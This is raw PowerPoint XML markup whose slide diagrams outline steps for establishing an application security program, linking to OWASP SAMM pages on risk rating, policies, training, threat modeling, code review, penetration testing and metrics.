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93" r:id="rId2"/>
    <p:sldId id="296" r:id="rId3"/>
    <p:sldId id="277" r:id="rId4"/>
    <p:sldId id="272" r:id="rId5"/>
    <p:sldId id="274" r:id="rId6"/>
    <p:sldId id="301" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="256" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="258" r:id="rId11"/>
    <p:sldId id="260" r:id="rId12"/>
    <p:sldId id="297" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="298" r:id="rId15"/>
    <p:sldId id="259" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="299" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="302" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="281" r:id="rId22"/>
    <p:sldId id="286" r:id="rId23"/>
    <p:sldId id="280" r:id="rId24"/>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752E"/>
    <a:srgbClr val="D9EAD5"/>
    <a:srgbClr val="B3D6AC"/>
    <a:srgbClr val="4A1647"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FF2600"/>
    <a:srgbClr val="4A1748"/>
    <a:srgbClr val="D0D9CF"/>
    <a:srgbClr val="4E8542"/>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807" autoAdjust="0"/>
    <p:restoredTop sz="95335" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="180" d="100"/>
          <a:sy n="180" d="100"/>
        </p:scale>
        <p:origin x="728" y="-547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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/drawing1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="Externa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en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Get Started</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>application security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> and drive adoption. </a:t>
          </a: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en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Risk Based Portfolio Approach</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F576BD5F-AD4E-429F-935A-1A67C630AE0F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Identify and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>prioritize your application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> from an inherent risk perspective. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" type="parTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EBA831D-0061-461C-A1EF-795466184E12}" type="sibTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Establish a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>common risk rating model</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" type="parTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6249606A-E44B-456D-8550-331FDC0465D3}" type="sibTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Enable with a Strong Foundation</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91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Establish a set of focused </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>policies and standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> that provide an application security baseline for all development teams to adhere to.</a:t>
          </a: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FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Define a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>common set of reusable security controls</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> that complement these policies and standards and provide design and development guidance on their use.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" type="parTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}" type="sibTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{024BBBE2-0706-4354-8AB0-3262009E8862}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> that is required and targeted to different development roles and topics.  </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" type="parTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C468EA37-5762-4D06-A4F9-E930ECF24341}" type="sibTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Integrate Security  into Existing Processes</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BC25BDC-3278-4082-B675-15E8A5144241}" type="parTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" type="sibTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Define and integrate </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>secure implementation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>verification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> activities into existing development and operational processes.  Activities include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>Threat Modeling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, Secure Design &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, Secure Coding &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>Code Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>Penetration Testing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, and Remediation.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" type="parTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}" type="sibTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Provide subject matter experts and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> to be successful.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" type="parTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}" type="sibTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C40210B5-480D-4766-978A-36F3F23CB9B8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Provide Management Visibility</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" type="parTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A003834B-8490-4CC6-B531-19539D19FBD4}" type="sibTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" type="parTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}" type="sibTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" type="parTrans" cxnId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}" type="sibTrans" cxnId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
